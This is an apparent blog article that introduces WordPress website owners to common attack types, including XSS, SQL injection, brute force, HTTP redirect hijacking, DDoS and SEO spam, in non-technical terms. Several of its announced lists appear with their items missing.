Imagine yourself shouting this text as loud as you can.
Everything you worked on: your content, your witty jokes, your well selected images.
And the visitors to your site, your potential customers, don’t see all the content you spent so much time and money on. Instead they see “HACKED BY GHOST 2945, COURTESY OF IDIOT SECURITY”
In this article, we’ll look at the dangers facing your WordPress website(s), and some solutions designed to help you avoid the scenario we just described.
WordPress is, by far, the most popular CMS on the internet – it powers 43% of all websites. While this makes for a great community, it also paints a giant target on our backs. According to the Arishi agency, WordPress websites are attacked 90,000 times a minute*.
There are several reasons for WordPress’s vulnerability:
So let’s look at some of the most common attacks on WordPress websites:
This is the most common form of attack on WordPress sites. In an XSS attack, hackers inject malicious code into either a webpage (a reflected XSS attack) or the website’s database (a stored XSS attack).
XSS attacks can take several forms:
While attacking your page, these hackers can also inject code into your server, turning them into stored XSS attacks on all your website’s visitors.
Hackers can use the data they’ve gathered to steal information from users or even impersonate them. They can also redirect visitors to scam sites or steal your server’s resources.
SQL injection attacks are the second most common form of attacks on WordPress sites and are particularly dangerous. Like XSS-attacks, they use malicious code to attack your site. The difference is that while XSS attacks usually target webpages, SQL injection attacks target your database.
WordPress websites are built using SQL databases. All your posts, pages, images and other data are stored in an SQL database. Most WordPress sites are generated dynamically, which means that when visitors come to your site, WordPress grabs the information from the database and constructs the webpage on-the-fly.
It’s this back and forth between the site and the database that leave you vulnerable to SQL injection attacks.
Similar to XSS attacks, SQL injection attacks can take several forms:
Once your database accepts code from outside parties, hackers can send commands to the database just like the website owner is able to.
These types of attacks are generally aimed at exfiltrating, or downloading, the data from your server to their computer. This means usernames, passwords, credit card numbers etc. are all vulnerable. Like XSS attacks these hacks can also be used to redirect users to scam websites or to take over your server resources.
The growth in automated hacking tools and bots gave rise to Brute Force attacks. As their name implies, these bots simply try millions of username password combinations to try and access your website admin area, preferably with admin level permissions. If these bots are able to crack your username password combo, they gain complete control of your site.
Man-in-the-middle attacks actually describe a wide variety of different attacks. It’s basically any attack where the visitor thinks they are communicating with a website but they’re actually sending information to hackers. Here we’ll talk specifically about HTTP man-in-the-middle attacks.
When the internet was first being developed, websites were given the prefix HTTP. Due to security concerns, a new protocol was put in place, making a new standard prefix HTTPS (the new “s” is for “secure”). In order to make sure people who still use the old prefix still end up at the correct sites, almost all HTTP pages automatically redirect visitors to the equivalent HTTPS page. However, this redirect gives hackers an opportunity to intercept this traffic.
For WordPress sites, plugins are used for these redirects and outdated plugins let hackers hijack the redirect and send users to scam sites.
In 2019, Wordfence discovered a vulnerability in one such redirect plugin that was installed in over 70,000 websites.
DDoS attacks are one of the oldest types of hacks on the internet. Imagine you have a site that normally gets 1,000 visitors an hour. Now, imagine that suddenly a million visitors an hour are trying to load your site’s pages. Server resources are strained and pages take forever to load, lowering your site’s performance and user experience, which can negatively impact SEO rankings and discourage potential customers.
So where do these millions of visitors come from? These are bot networks targeting your site, visiting over and over again, with the clear intent of taking down your server and chasing away your human visitors. And to tie it all together, these bot networks are often constructed from resources stolen from servers using one of the other types of attacks we outlined above.
There are a number of motivations for DDoS attacks:
SEO stands for Search Engine Optimization, essentially it’s the way search engines find and rank sites on the web.
SEO Spam attacks are quite insidious. They are very hard to detect but can essentially destroy your site. In an SEO Spam attack, once hackers have control of your site (via one of the methods described above), they secretly fill your site with backlinks leading to a scam site.
This boosts the scam site’s SEO rating, but this is considered an illegitimate form of increasing SEO, so once search engines detect it (and are alerted to the fact that your site is linking to a scam site), they’ll penalize you. This means people searching for sites like yours will never see it.
There are a number of basic, but critical, steps you can take to defend yourself from these attacks:
The internet has provided unprecedented opportunities for businesses to reach potential customers, but along with that they are exposed to criminals around the world. And while large companies and organizations are doing their best to make the internet safe, ultimately it’s up to you, the website owner, to stay safe.
*Yes I know the number seems ridiculous, but keep in mind that today’s hackers are using automated tools and bots that are constantly attacking, probing and looking for weaknesses.